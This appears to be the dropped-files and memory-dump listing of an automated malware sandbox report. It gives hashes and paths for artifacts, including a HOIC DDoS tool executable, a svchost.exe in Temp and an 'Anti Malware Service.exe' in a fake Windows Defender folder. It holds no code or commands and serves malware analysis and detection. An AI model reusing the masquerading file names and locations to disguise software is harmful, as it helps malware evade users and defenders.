SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cae60f0ddddac635da71bba775a2c5b4

SHA1
386f1a036af61345a7d303d45f5230e2df817477

SHA256
b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

SHA512
28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10fb30dc297f99d6ebafa5fee8b24fa2

SHA1
76904509313a49a765edcde26b69c3a61f9fa225

SHA256
567bcacac120711fc04bf8e6c8cd0bff7b61e8ee0a6316254d1005ebb1264e6a

SHA512
c42ace1ea0923fa55592f4f486a508ea56997fdbe0200016b0fc16a33452fc28e4530129a315b3b3a5ede37a07097c13a0eb310c9e91e5d97bb7ce7b955b9498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
47605a4dda32c9dff09a9ca441417339

SHA1
4f68c895c35b0dc36257fc8251e70b968c560b62

SHA256
e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a

SHA512
b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98f841e438be7b74f893cd4f792676d9

SHA1
e0d05b9e78482a1cd58c036056cf21d5e873bbdd

SHA256
6864d2e5a9cb45d2fe4a2712bcc936f14dd77f966bfce8003bdb290ffb40d08b

SHA512
d1b38e6e5a624e857bdb6214cf52dbdbdda77734b38af80608acef71474b86f5d2c5123601509577c0ee449062ad25980ebfe3e9bd7051f176ef22fa76e6cbba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
21f2b364ce568d174996d406c65e5e54

SHA1
352d08f17385d09adc3ee87f06c892d947ffa23f

SHA256
f64e8c7fc35f6ddbc18fd18796c60b200a9a70872eeed77bb5e457ddf176cb43

SHA512
0dd3d69e2bae84f754eb8dca909cbe318e4f4f63eface2ad1f20c0d492452d1f7f5553fe11a3fc195dd3bebe4399ff05eb777f770da56173d5de269c80e170b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0cef0ab8fb4f5e4162ce67e844c3aa54

SHA1
4deb083986e41017371af415c8a0829da4a9f626

SHA256
b0aa3ab509f749d4ec08cd6ec38a707d1b3c18f1386e5bcf017119cda834adbe

SHA512
0f562119e6229d1bcaa3e34253685dc255cbb419515218876c1868e70f9f95d9f158a2658272e3f4bd9d7276aee79d5d2ae05ce8bfb453aa4b6af6ae84a90541

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
19e1e2a79d89d1a806d9f998551c82a8

SHA1
3ea8c6b09bcaa874efc3a220f6f61eed4be85ebd

SHA256
210f353fbdf0ed0f95aec9d76a455c1e92f96000551a875c5de55cfa712f4adc

SHA512
da427ad972596f8f795ae978337e943cb07f9c5a2ed1c8d1f1cad27c07dcec2f4d4ffe9424db2b90fcba3c2f301524f52931a863efae38fca2bef1def53567b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dbb22d95851b93abf2afe8fb96a8e544

SHA1
920ec5fdb323537bcf78f7e29a4fc274e657f7a4

SHA256
e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465

SHA512
16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dcac476fa19b9b7e00d97d937daf7e9f

SHA1
2753854fb9097e0c50667c4df11e336bada512e2

SHA256
ebbf20b0c098d467090c4115109b5f707b559a8006e9c17f00235a5d23d60399

SHA512
81d587000267413d0b829d783aa2ea4d6f7dfdf991d0463cd49bae3090f36db0b16a63b1ca28ae9a8e52fe2a516bffbad3ff624d5b55e8956d728bb44ed5ea4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fa08795ae46c89bc1c82975d1dba755e

SHA1
7bdd34e3643f1fa8b6e915370aa7b06f5c7422ff

SHA256
27635ffb2dab9c4c772f51ff03961d89eb0c0841e9011f78f173f677267e69ff

SHA512
005289af4d05e63bafe564ced158f47de36f3719ecf056c493623261cdbf5fb39280e70489ceb389cdabe4fa3a4b64a67bb6b6472907fdbcfa2a35e990a971ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5cfe303e798d1cc6c1dab341e7265c15

SHA1
cd2834e05191a24e28a100f3f8114d5a7708dc7c

SHA256
c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

SHA512
ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
01fff31a70e26012f37789b179059e32

SHA1
555b6f05cce7daf46920df1c01eb5c55dc62c9e6

SHA256
adf65afaf1c83572f05a99bf2ede8eb7be1aab0717d5254f501d5e09ba6f587b

SHA512
ac310c9bc5c1effc45e1e425972b09d1f961af216b50e1a504caa046b7f1a5f3179760e0b29591d83756ecb686d17a24770cf06fcea57e6f287ca5bbf6b6971b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
21bfc799247c23be8c83723a21d31bb5

SHA1
53b308a69a2e57ce004951c978ea8e008e29ca56

SHA256
eab1228d3d5af575fdf617768fdd5371ca706e4f48a8f9f4583b58663fbc5be3

SHA512
19e9ed32a3c302ea7d4ff23df4f6dfc7ba72775e18ce47f284db22f9059309448d77fd123984adcef11e647403a01f3cf45bd463857af77ae882be885001e746

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9f629d2038fddc716e498f0fe618081e

SHA1
58857b3b683f8a34553f0a683ef366baf7b37907

SHA256
4cffd53a4c1299c817c7f9de80ff3bb68e5d7c7c692e93d6ec39d19c1b1998fe

SHA512
bf6455d0553453acd66ec56eef63ea0ac96f0137d8906f162ee2353b3194041c9775f62af5b82cf72c7564549b47abd35db664cbca579c62b565721f84a63ea3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c603938c0aca756d1fd9bcef185b49cf

SHA1
611c07f1026b1df08c6302bcc4af2f624212e527

SHA256
2df5e37f1d789512f9623291f25412a3472d9d700fef8aab787fbefd8b7c8f10

SHA512
a4bce06d88755c6cc3636c381d596e8ccb41a10853f598b00e19af66b53963f95eec31bda499fa9a3aefa6183896bfb869ed33a6bcf69f5e68b04b472bab5d70

Download Submit
C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe

Filesize
8.5MB

MD5
451c94a23536dcbba422d7612b34b6ff

SHA1
0b419c8b9f60cb9cb8957a6dbccb393b5d072e43

SHA256
3c9806f8e132917ef85512505fadaca733e5523c271dd2e2a6925ddb9c3d0df0

SHA512
b777963ab9d21efa29528e6a126e616088205aff9e1b63453c731966dccf5f15cf30f17a933d40c98347a2d057b5f2cb40e40847f41476f0f212b28ce12e94de

Download Submit
C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe

Filesize
4.4MB

MD5
a2b98f2c39c4ee63db62e17f1922543b

SHA1
74ec3e0bd346f66124e31a88342fdb7360795373

SHA256
4ffa5259e2480cedc72cb451274b99839415980f79cc8aa00c732e8e3422e900

SHA512
54cb755cd150d0dc49ec5023a2be3e1a851300c9d90fe7eb9beca1fecdaf17c31a5a85f4662c0600cc690292b98e078df4295c56d733ee40911bafaf580f13f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmsdlqko.eyr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
63KB

MD5
4ba7faa19363c41304cbdc35aa60ba56

SHA1
afc806d82fae43d2427bd7b2deaf13c8473847da

SHA256
e88d123cf046a30859753771d3052b1290534acca5eaec94d8d0590b86d70178

SHA512
7a5fc420bac78206fe35766bd6c908879fc5e7ed88f87f2ff4ebee643a4e554ef6c94de69dec20e44024df7fc46b582dbc4744078e15d657c60f5999001ffda8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9097.tmp.bat

Filesize
151B

MD5
1ada5e67d49e5ec8586f5816686332cb

SHA1
dfbd4bd8c69945cc7fffe0dd97fb9c51cb144285

SHA256
36a621a08a5308bd4f418507667a95914e56d4b6d80ffbd40084618236d9cee6

SHA512
d3c3d938ccf961cf477c8cbefecb1eda2e2a0084ee96adf365284a716b3749761e22d7724d815af03fce2340e801f9747aaff63d41eb4c45a7acaae877fe97c3

Download Submit
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe

Filesize
900KB

MD5
3c5edd9bbe4c8fccc43b1849128d4fbc

SHA1
e046251308e1dc9b7722b1d32f8bc9593d7c1dc9

SHA256
64b38f64129aa45c3b5aa5bd87a682814adec425326603565c0c1d013fdb4cc1

SHA512
de3ce4e2f9e689bc7d8b06682f974502d63772e097aa76caa8f83ef961e168b10371f0c1f8e0645005c24162e7fcd7a69f31a4eabc9564d1a50df11ec092cc14

Download Submit
memory/552-69-0x00000244F9570000-0x00000244F9592000-memory.dmp

Filesize
136KB

Download
memory/876-179-0x0000016DE8AA0000-0x0000016DE8C0A000-memory.dmp

Filesize
1.4MB

Download
memory/2284-254-0x000002A06A440000-0x000002A06A5AA000-memory.dmp

Filesize
1.4MB

Download
memory/2416-1-0x00000000005B0000-0x00000000012B2000-memory.dmp

Filesize
13.0MB

Download
memory/2416-0-0x00007FFBEE8F3000-0x00007FFBEE8F5000-memory.dmp

Filesize
8KB

Download
memory/2512-353-0x00007FF6DD740000-0x00007FF6DDBB0000-memory.dmp

Filesize
4.4MB

Download
memory/2804-242-0x0000023B34540000-0x0000023B346AA000-memory.dmp

Filesize
1.4MB

Download
memory/3236-167-0x000001C941720000-0x000001C94188A000-memory.dmp

Filesize
1.4MB

Download
memory/3616-218-0x0000025BF1960000-0x0000025BF1ACA000-memory.dmp

Filesize
1.4MB

Download
memory/3700-191-0x000001B7C24C0000-0x000001B7C262A000-memory.dmp

Filesize
1.4MB

Download
memory/4076-24-0x00007FFBEE8F0000-0x00007FFBEF3B1000-memory.dmp

Filesize
10.8MB

Download
memory/4076-23-0x0000000000930000-0x0000000000946000-memory.dmp

Filesize
88KB

Download
memory/4076-99-0x00007FFBEE8F0000-0x00007FFBEF3B1000-memory.dmp

Filesize
10.8MB

Download
memory/4404-49-0x0000000010000000-0x00000000100C8000-memory.dmp

Filesize
800KB

Download
memory/4404-53-0x0000000002420000-0x0000000002430000-memory.dmp

Filesize
64KB

Download
memory/4404-61-0x0000000002EF0000-0x0000000002F10000-memory.dmp

Filesize
128KB

Download
memory/4460-373-0x00007FF7B2AA0000-0x00007FF7B2B87000-memory.dmp

Filesize
924KB

Download
memory/4472-370-0x000001B645670000-0x000001B645671000-memory.dmp

Filesize
4KB

Download
memory/4896-206-0x0000028318210000-0x000002831837A000-memory.dmp

Filesize
1.4MB

Download
memory/5064-230-0x0000023754A70000-0x0000023754BDA000-memory.dmp

Filesize
1.4MB

Download